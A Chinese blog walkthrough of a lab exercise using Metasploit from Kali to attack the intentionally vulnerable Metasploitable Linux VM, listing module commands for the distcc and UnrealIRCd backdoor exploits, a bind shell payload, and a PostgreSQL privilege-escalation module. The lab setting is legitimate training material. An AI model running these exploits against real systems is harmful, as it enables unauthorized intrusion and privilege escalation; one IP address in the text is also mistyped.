MSF模拟渗透测试攻击linux实例

MSF模拟渗透测试攻击linux实例

前言

一、靶机metasploitable的使用

靶机MSF是一个linux的靶机漏洞平台,自身存在着很多漏洞,可以进行利用,本次就进行kali对linux的一次渗透攻击。

二、利用kali攻击linux获得会话进行提权

1.利用MSF本身存在的后门漏洞进行攻击

(1)首先下载好靶机MSF,打开kali,使用弱口令或者在百度上查询MSF的默认登录密码进行破解密码。
主机:kali
目标主机:MSF(linux)
在这里插入图片描述
登录成功后,输入ifconfig,出现ip地址192.18.222.1
(2)登录kali的MSF
使用靶机存在的后门漏洞模块
search distcc
use exploit/unix/misc/distcc_exec
在这里插入图片描述
(3)options查看参数
set rhosts 192.168.222.1
run后发现没有选择payload
在这里插入图片描述
(4)选择payload
show payloads
set payload payload/cmd/unix/bind_perl
在这里插入图片描述
发现distcc模块行不通,利用另一个模块(在百度上找的)
use exploit/unix/irc/unreal_ircd_3281_backdoor
在这里插入图片描述
show payloads
set payload payload/cmd/unix/bind_perl
设置好payload后,设置ip地址
options
set rhosts 192.168.222.1
在这里插入图片描述
(5)run,出现shell,background,输入y
输入sessions,查看会话信息
在这里插入图片描述
sessions -u 3,使用会话
使用攻击模块
use exploit/linux/postgres/postgres_payload
options
在这里插入图片描述
(6)设置ip地址,run
在这里插入图片描述
提权成功,成功进入会话。

2.使用攻击模块,进入会话,提权成功

查看id,端口信息
在这里插入图片描述
进入会话,提权成功,实验结束。

总结

本次实验是MSF攻击linux的一次渗透测试实例,利用相对应的模块进行攻击提权利用,掌握攻击linux,提权模块的使用原理。

评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值